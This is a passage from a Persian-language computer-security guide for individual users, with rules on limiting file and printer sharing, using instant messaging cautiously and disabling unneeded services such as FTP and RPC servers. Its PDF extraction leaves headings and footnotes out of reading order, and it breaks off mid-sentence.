‫ﺷﻤﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ‪ ،‬ﺍﻓـﺮﺍﺩ‬
‫ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﻳـﻚ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ‬
‫ﺿﻌﻴﻔﺘﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺑـﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ‬
‫ﻼ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﻪ ﺑـﻪ‬
‫ﺁﻧﻬﺎ ﭘﻴﺶ ﺁﻳﺪ ﺩﺭ ﺍﻣﺎﻥ ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﻣﺜ ﹰ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺗﻮﺳﻂ ﻳﻚ ﻭﻳﺮﻭﺱ ﺁﻟﻮﺩﻩ ﺷـﻮﺩ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﻧﻴﺰ ﺁﻟﻮﺩﻩ ﮔﺮﺩﻧﺪ‪.‬‬
‫ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﭽﻪ ﻛﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺩﻫﺪ )ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷﺘﻦ‪ ،‬ﺍﻳﺠﺎﺩ ﻭ ﭘـﺎﻙ ﻧﻤـﻮﺩﻥ( ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻣﻲ ﺍﻋﻤـﺎﻝ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺭﺍ‬
‫ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺴﻬﻴﻼﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﻣﺤــﺪﻭﺩ ﺳــﺎﺯﻳﺪ ﻛــﻪ ﺑــﻪ ﻓﺎﻳﻠﻬــﺎ ﺗﻨﻬــﺎ ﺍﺟــﺎﺯﺓ‬
‫ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﺑﺪﻫﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔـﺮ ﻧﻴـﺎﺯﻱ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻧﻮﺷﺘﻦ ﻧﺪﺍﺭﻳﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﻏﻴﺮ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﺎﭘﮕﺮﻫﺎ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧـﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬
‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﭼﺎﭘﮕﺮ ﭼﻨﺪﺍﻥ ﭘﺮﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﻢ ﻣﮕﺮ ﺁﻧﻜـﻪ ﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﭼﺎﭘﮕﺮ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺠﻮﺯﻫﺎﻳﻲ ﻛﻪ ﺍﺧﺘـﺼﺎﺻﹰﺎ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎﻱ‬
‫ﭼﺎﭘﻲ ﺻﺎﺩﺭ ﺷﺪﻩ‪ ،‬ﺍﻣﻜﺎﻥ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ‪.‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ‬
‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴـﺪ ﺁﻧـﺮﺍ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻪ ﺁﻥ‪ ،‬ﺩﺳﺘﺮﺳﻴﻬﺎﻱ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﻗﻌ ﹰﺎ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﭘﻴﺎﻡ‬
‫ﺗﺎﻳﭗﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺰﻣﺎﻥ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕـﺮ ﺑـﻪ‬
‫ﻧﻤــﺎﻳﺶ ﺩﺭﺁﻳــﺪ‪ .‬ﺑــﺮﺧﻼﻑ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺩﺍﺭﺩ‪ .‬ﺩﺭ‬
‫ﻣﻴــﺎﻥ ﺁﻧﻬــﺎ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ‪،١٠١IRC ،MSN Messenger‬‬
‫‪ ،١٠٢AIM ،Yahoo Chat‬ﻭ ﻧﻴﺰ ‪ ١٠٣ICQ‬ﺍﺷﺎﺭﻩ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ‪ ،‬ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ ﻭ‬
‫ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺑـﻪ ﻛﻤﺘـﺮﻳﻦ ﺣـﺪ ﻣﻤﻜـﻦ ﻛـﻪ‬
‫ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺭ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫﻴـﺪ‬
‫ﻣﺤﺪﻭﺩ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﺍﺭﺗﺒﺎﻃـــﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـــﻲ ﺍﺯ ﻗﺒﻴـــﻞ ‪،Yahoo ،MSN ،AOL‬‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ‪ ...‬ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ‪Messenger‬‬
‫ﻭ ‪ Chat‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺳـﺎﻳﺮﻳﻦ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻧﺠـﺎﻡ‬
‫ﻧﻤﻲﺩﻫﻨﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﭘﺎﻧﺰﺩﻫﻢ‪:‬‬
‫ﻗﺎﻧﻮﻥ ﺷﺎﻧﺰﺩﻫﻢ‪:‬‬
‫ﻗﺎﻧﻮﻥ ﻫﻔﺪﻫﻢ‪:‬‬
‫ﺍﮔﺮ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﻣـﻲﮔﺬﺍﺭﻳـﺪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ‬
‫ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ‬
‫‪100 File Server‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ ﺑـﻪ ﻛـﺎﺭﺑﺮ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﻨﺪ ﺍﺳﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﺪ ﻛﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﺑـﻪ‬
‫ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺳﺎﻳﺮﻳﻦ ﻧﻴﺰ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻭ ﭘﻴـﺎﻡ‬
‫ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺳﺎﻣﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺷﻮﻧﺪ ﻛﻪ ﻫﻮﻳﺖ‬
‫ﺍﺻﻠﻲ ﺷﻤﺎ ﭘﻨﻬﺎﻥ ﺑﻤﺎﻧﺪ‪ ،‬ﺍﮔﺮﭼﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺁﺩﺭﺱ ‪ IP‬ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ‪.‬‬
‫‪101 Internet Relay Chat‬‬
‫‪102 AOL Instant Messenger‬‬
‫‪ ۱۰۳‬ﻳﻚ ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﺑﺮﺍﻱ ﻋﺒﺎﺭﺕ "‪" I Seek You‬‬
‫‪٩١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻗﺎﻧﻮﻥ ﻫﺠﺪﻫﻢ‪:‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺁﻥ ﺑﺎ ﺁﮔﺎﻫﻲ ﻭ ﺩﻗﺖ ﻛﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﻧﻘـﺶ ﻣﻔﻴـﺪﻱ ﺍﻳﻔـﺎ‬
‫ﻣﻲﻛﻨﺪ‪:‬‬
‫•‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﺸﻐﻮﻝ ﺍﻧﺠﺎﻡ ﻛـﺎﺭ ﺩﻳﮕـﺮﻱ ﻫـﺴﺘﻴﺪ ﭘﻴـﺎﻡ ﺩﺭ‬
‫ﭘﻨﺠﺮﺓ ﻛـﻮﭼﻜﻲ ﺭﻭﻱ ﺻـﻔﺤﺔ ﺷـﻤﺎ ﺩﺭﻳﺎﻓـﺖ ﻭ ﺍﺭﺳـﺎﻝ‬
‫ﻣﻲﮔﺮﺩﺩ ﻭ ﭼﻨﺪﺍﻥ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﺳﺎﻳﺮ ﻛﺎﺭﻫﺎﻳﺘﺎﻥ‬
‫ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫•‬
‫ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻛـﻪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻭ ﻫﻮﻳـﺖ(‬
‫ﺧــﻮﺩ ﺭﺍ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺷــﺮﻛﺖﻛﻨﻨــﺪﮔﺎﻥ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ‬
‫ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻓﺎﺵ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ﻣﻮﺍﺭﺩ ﺧﺎﺹ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺟﺢ ﺍﺳﺖ‪ .‬ﺩﺭﻧﻈﺮ ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ‬
‫ﺳﺮﻭﻳﺲ ﺍﻳﻤﻦﺗﺮ ﻧﻴﺰ ﻫﺴﺖ؛ ﭼﺮﺍﻛﻪ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﻣﻜﺎﻧﻬـﺎﻱ ﺩﻳﮕـﺮ‬
‫ﺩﻳﺴﻚ ﻛﭙﻲ ﻧﻤﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳـﻦ‬
‫ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﺁﻧﻬﺎ ﺍﻳﻤﻦ ﻧﺒﺎﺷﺪ‪ .‬ﻣﺸﻜﻞ ﺍﺻﻠﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ ﻫــﻢ ﺩﺍﺭﻧــﺪ‪ .‬ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﺁﻧﻬــﺎ ﺭﺍ ﻣﺎﻧﻨــﺪ ﺳــﺎﻳﺮ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﻙ ﻓﺎﻳﻞ ‪ -‬ﻣﺜﻞ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪-‬‬
‫ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ‬
‫ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﺩﺳـﺘﻮﺭﺍﺕ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻧﻴـﺰ ﻣـﻲﺩﻫﻨـﺪ ﻭ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﻭﻗﻮﻉ ﺗﻬﺎﺟﻢ ﮔﺮﺩﺩ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﻧﻮﺯﺩﻫﻢ‪:‬‬
‫ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻋﺮﺿﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺁﮔﺎﻩﺷﺪﻥ ﺍﺯ‬
‫ﻣﺸﻜﻼﺕ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻋﻠﻴﺮﻏﻢ ﻋﻼﻗـﺔ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﻪ ﻭ‬
‫ﻋﺮﺿﺔ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺎ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺯﻳﺎﺩ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﺎ‬
‫ﺧﺪﻣﺎﺕ ﻓﺮﻋﻲ ﻏﻴﺮﻓﻌﺎﻝﺷﺪﻩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻛﺎﺭﺑﺮ ﺩﺭﺻﻮﺭﺕ‬
‫ﻧﻴﺎﺯ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮﻳـﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺭﺍ ﻓﻌـﺎﻝ ﺳـﺎﺯﺩ‪ .‬ﻏﻴﺮﻓﻌـﺎﻝ ﺑـﻮﺩﻥ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺻﻲ ﻧﻤـﻲﺷـﻮﺩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ‬
‫ﺩﺍﺭﺩ‪ .‬ﭼﻨــﻴﻦ ﺧــﺪﻣﺎﺗﻲ ﺷــﺎﻣﻞ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳﻠﻬــﺎ ﻭ ﭼــﺎﭘﮕﺮ‪،‬‬
‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﻭﺏ‪ ،‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘﺮﻭﺗﻜــﻞ ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ‬
‫)‪ ،١٠٤(FTP Servers‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ )‪ ١٠٥(RPC Servers‬ﻭ ﻏﻴﺮﻩ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﻓﻌﺎﻝ ﻏﻴﺮﺿﺮﻭﺭﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﺴﻴﺎﺭ ﻗﺪﺭﺗﻤﻨـﺪ ﻭ ﻛـﺎﺭﺁ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﻻﺯﻡ ﻧﺪﺍﺭﺩ‪ .‬ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺑﺎﻳـﺪ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﺷﻮﻧﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻌﻀﻲ ﺍﺯ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﺗﻤﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺴﺘﮕﻲ ﺑﻪ‬
‫ﻛﺎﺭﺑﺮ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻳﺎ ﻧﻜﻨـﺪ‪ ،‬ﻭ ﺩﺭ ﻏﺎﻟـﺐ ﻣـﻮﺍﺭﺩ‬
‫‪104 File Transfer Protocol Servers‬‬
‫‪105 Remote Procedure Call Servers‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫•‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍﺣـﺖﺗـﺮ ﻭ‬
‫ﺳﺮﻳﻌﺘﺮ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻴﭻ ﺗﺄﺧﻴﺮﻱ ﻧﺪﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﺁﻥ ﻋﻤﻠﻲﺗـﺮ ﺍﺯ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻫﻢ ﻛﺎﺭﺑﺮ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺁﮔﺎﻩ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ‬
‫ﭼﻨﺪﻳﻦ ﺳﺎﻝ ﻣﺘﻮﺍﻟﻲ ﺑﻌـﻀﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ UNIX‬ﺑﮕﻮﻧـﻪﺍﻱ‬
